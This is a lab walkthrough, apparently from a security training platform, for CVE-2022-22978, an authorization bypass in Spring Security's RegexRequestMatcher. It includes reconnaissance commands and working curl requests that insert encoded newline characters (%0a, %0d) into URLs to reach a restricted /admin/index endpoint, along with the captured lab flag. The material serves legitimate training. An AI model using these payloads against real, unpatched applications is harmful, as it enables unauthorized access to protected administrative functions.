Lab Walkthrough — Authorization Bypass in RegexRequestMatcher [CVE-2022–22978]
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Introduction
What is Spring Security?
Spring Security is a powerful and highly customizable authentication and access-control framework. It is the de-facto standard for securing Spring-based applications.
Spring Security is a framework that focuses on providing both authentication and authorization to Java applications. Like all Spring projects, the real power of Spring Security is found in how easily it can be extended to meet custom requirements.
Reference: https://spring.io/projects/spring-security
Authorization Bypass in RegexRequestMatcher (CVE-2022–22978)
In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-22978
NVD has assigned a base score of 9.8 (Critical) to this vulnerability!
The vulnerability
Applications using RegexRequestMatcher with a regular expression that contains . (as well as *) are likely vulnerable to an authorization bypass for versions:
- Spring Security
- 5.5.x prior to 5.5.7
- 5.6.x prior to 5.6.4
- Earlier unsupported versions
Reference: https://tanzu.vmware.com/security/cve-2022-22978
Lab Environment
In this lab environment, the user is going to get access to a low-privileged user in an Ubuntu CLI instance. The root user on the same Ubuntu instance is hosting an application leveraging Spring Security that is vulnerable to CVE-2022–22978and is accessible from the tools installed on the Ubuntu machine at http://127.0.0.1:8080.
Objective: Exploit the authorization bypass in RegexRequestMatcher, in the vulnerable Spring Security-based application to access the restricted endpoint — /admin/index.
Acknowledgments
The setup code is based on the following GitHub repository: https://github.com/DeEpinGh0st/CVE-2022-22978
Tools
The best tools for this lab are:
- cURL
- Nmap
Solution
Step 1: Scan the machine for open ports using Nmap.
Once the lab link is opened, you should have access to an Ubuntu CLI instance.
Run the following command to scan the machine for open ports:
Command:
nmap 127.0.0.1
Port 8080 is open!
Step 2: Check the running processes and listening connections list.
List the running processes:
Command:
ps aux
Notice the java process is running with root privileges.
Check the complete line for that process entry (we could have checked the /proc//cmdline file as well):
Command:
ps aux > out
cat out
It is a Spring Security-based application.
Check for the active listening TCP ports:
Command:
ss -pant
Port 8080 seems to be the only candidate on which the Spring Security-based application might be listening.
This can be confirmed by sending a curl request to the available candidate ports.
Step 3: Send a request to the Java application on port 8080.
Command:
Notice one link in the response: /admin/index.
Request contents for that link:
Command:
curl http://127.0.0.1:8080/admin/index
The response says forbidden. It must be a route accessible to authenticated users.
Step 4: Search for Spring Cloud Authorization bypass exploits.
Search Query: spring security authorization bypass
As stated on Snyk’s website: org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.
Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured to be bypassed on some servlet containers when it is used with . in the regular expression.
Check the PoC link:
URL: https://github.com/ducluongtran9121/CVE-2022-22978-PoC
On this page, the exploit for the regexMatcher is listed:
We can supply %0a or %0d in the URI to bypass the authorization checks and access the restricted endpoint!
Step 5: Exploit CVE-2022–22978 to bypass the enforced authorization checks.
Send the following curl request to bypass the authorization checks:
Command:
curl http://127.0.0.1:8080/admin/%0aindex
The flag is retrieved back in the response:
Flag: 23e0520ade6129343e4c1d9fd63120ea
Alternatively, send the following request to bypass the authorization checks:
Command:
curl http://127.0.0.1:8080/admin/%0dindex
Curious readers can try these requests as well to bypass the authorization:
Command:
curl http://127.0.0.1:8080/admin/index%0a
Command:
curl http://127.0.0.1:8080/admin/index%0d
With that, we conclude this lab on authorization bypass in RegexRequestMatcher in Spring Security-based applications.
References
Try this exploit for yourself! or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Originally published at https://ine.com.
